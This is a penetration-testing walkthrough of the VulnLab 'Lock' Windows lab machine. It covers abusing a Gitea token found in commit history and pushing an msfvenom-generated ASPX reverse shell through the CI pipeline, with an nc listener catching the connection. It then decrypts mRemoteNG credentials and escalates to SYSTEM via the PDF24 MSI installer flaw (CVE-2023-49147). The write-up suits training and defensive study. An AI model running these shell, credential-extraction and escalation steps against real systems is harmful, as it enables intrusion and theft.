VL-Lock

Vulnlab Lock: Windows Privilege Escalation Through Gitea Repository Exploitation and PDF24 MSI Installer Abuse

In this comprehensive VulnLab walkthrough, I’ll demonstrate how to penetrate the “Lock” machine environment by exploiting a series of vulnerabilities leading to complete system compromise. Starting with Gitea repository enumeration and personal access token discovery, we’ll progress through automated deployment exploitation for initial access, credential extraction from mRemoteNG configuration files, and ultimately achieve SYSTEM-level privileges via PDF24 Creator MSI installer abuse (CVE-2023-49147). This penetration test showcases several real-world attack vectors including Git repository credential harvesting, CI/CD pipeline exploitation for web shell deployment, encrypted credential decryption from connection manager files, and leveraging MSI installer vulnerabilities with OpLock techniques for privilege escalation. The techniques demonstrated highlight common security misconfigurations in development environments that penetration testers should look for during enterprise assessments.

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Lock - Index
445/tcp  open  microsoft-ds? syn-ack ttl 127
3000/tcp open  ppp
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: LOCK
|   NetBIOS_Domain_Name: LOCK
|   NetBIOS_Computer_Name: LOCK
|   DNS_Domain_Name: Lock
|   DNS_Computer_Name: Lock
|   Product_Version: 10.0.20348
|_  System_Time: 2025-03-08T14:18:31+00:00
5357/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0

Foothold

Gitea

1
http://10.10.69.227:3000/

Gitea website

Possible Username: ellen.freeman

Looking into the commits we can find the gitea personal token:

1
http://10.10.69.227:3000/ellen.freeman/dev-scripts/commit/8b78e6c3024416bce55926faa3f65421a25d6370

Gitea Token

Modifying the script so it uses the AUTH token:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import requests
import sys
import os

def format_domain(domain):
    if not domain.startswith(('http://', 'https://')):
        domain = 'https://' + domain
    return domain

def get_repositories(token, domain):
    headers = {
        'Authorization': f'token {token}'
    }
    url = f'{domain}/api/v1/user/repos'
    response = requests.get(url, headers=headers)

    if response.status_code == 200:
        return response.json()
    else:
        raise Exception(f'Failed to retrieve repositories: {response.status_code}')

def main():
    if len(sys.argv) < 2:
        print("Usage: python script.py <gitea_domain>")
        sys.exit(1)

    gitea_domain = format_domain(sys.argv[1])

    personal_access_token = 'TOKEN'  # Use the provided token directly
    if not personal_access_token:
        print("Error: GITEA_ACCESS_TOKEN environment variable not set.")
        sys.exit(1)

    try:
        repos = get_repositories(personal_access_token, gitea_domain)
        print("Repositories:")
        for repo in repos:
            print(f"- {repo['full_name']}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    main()

we will get back the 2 repos she has made 

1
2
3
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website

After cloning the website repo with the below command

1
git clone http://ellen.freeman:43ce39bb0bd6bc489284f2905f033ca467a6362f@lock.vl:3000/ellen.freeman/website.git

Helpful Readme
we see in the readme.md that any change we make on the repo it will reflect on the actual website so now we can create a .aspx shell and place it on the website.

Generating a shell with msfvenom

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.195 LPORT=4444 -f aspx -o shell.aspx

And before we push our changes to the repo we need to setup git:

1
2
git config --global user.name ellen.freeman
git config --global user.email ellen.freeman@lock.vl

Inside the repo we will add the new file, commit it and push it to the repo:

1
2
3
git add shell.aspx
git commit -m "shell"
git push

Then we start our listener and curl the wesbite for the shell to trigger:

1
rlwrap nc -nlvp 4444
1
curl http://lock.vl/shell.aspx

Sometimes it takes a couple of minutes untill the pipeline builds the changes we did on the repository, do not do multiple pushes to the repo as it restarts the process
Shell as Ellen

Priv Escalation

Ellen.Freeman to Gale.Dekarios

Inside the Directory of c:\Users\ellen.freeman\Documents there is a config.xml
taking a look into the xml we can see that its a file for Multi-Remote Next Generation Connection Manager https://mremoteng.org/. With a google search we can find a github repo that decripts the password that on the config.xml
https://github.com/gquere/mRemoteNG_password_decrypt

1
2
3
git clone https://github.com/gquere/mRemoteNG_password_decrypt
cd mRemoteNG_password_decrypt-master
python3 mremoteng_decrypt.py ../config.xml

RDP Password

Using xfreerdp we will establish an rdp session with the machine

1
xfreerdp /v:10.10.78.85 /u:Gale.Dekarios /p:

PDF24 - CVE-2023-49147

After getting into the rdp session we can grab the user flag and see that there is a program called PDF24 after a simple google search we can see that there is a privilege escalation exploit for it https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-msi-installer-in-pdf24-creator-geek-software-gmbh/

First we need to locate the msi installer, after some digging around (dont forget to look for hidden folders)
MSI file

Now we need to SetOpLock.exe to the machine, as we have rdp we can just copy paste it.

We will open two terminals in one of them we will lock the log file

1
SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r

And then we will patch the PDF24 app 

1
msiexec.exe /fa C:\\_install\\pdf24-creator-11.15.1-x64.msi

RDP exploits

After you let it load you can follow the github instructions to get a shell:

  • right click on the top bar of the cmd window
  • click on properties
  • under options click on the “Legacyconsolemode” link
  • open the link with a browser other than internet explorer or edge (both don’t open as SYSTEM when on Win11)
  • in the opened browser window press the key combination CTRL+o
  • type cmd.exe in the top bar and press Enter

https://api.vulnlab.com/api/v1/share?id=b0684778-d069-4d4a-ae3d-ce7e10d93464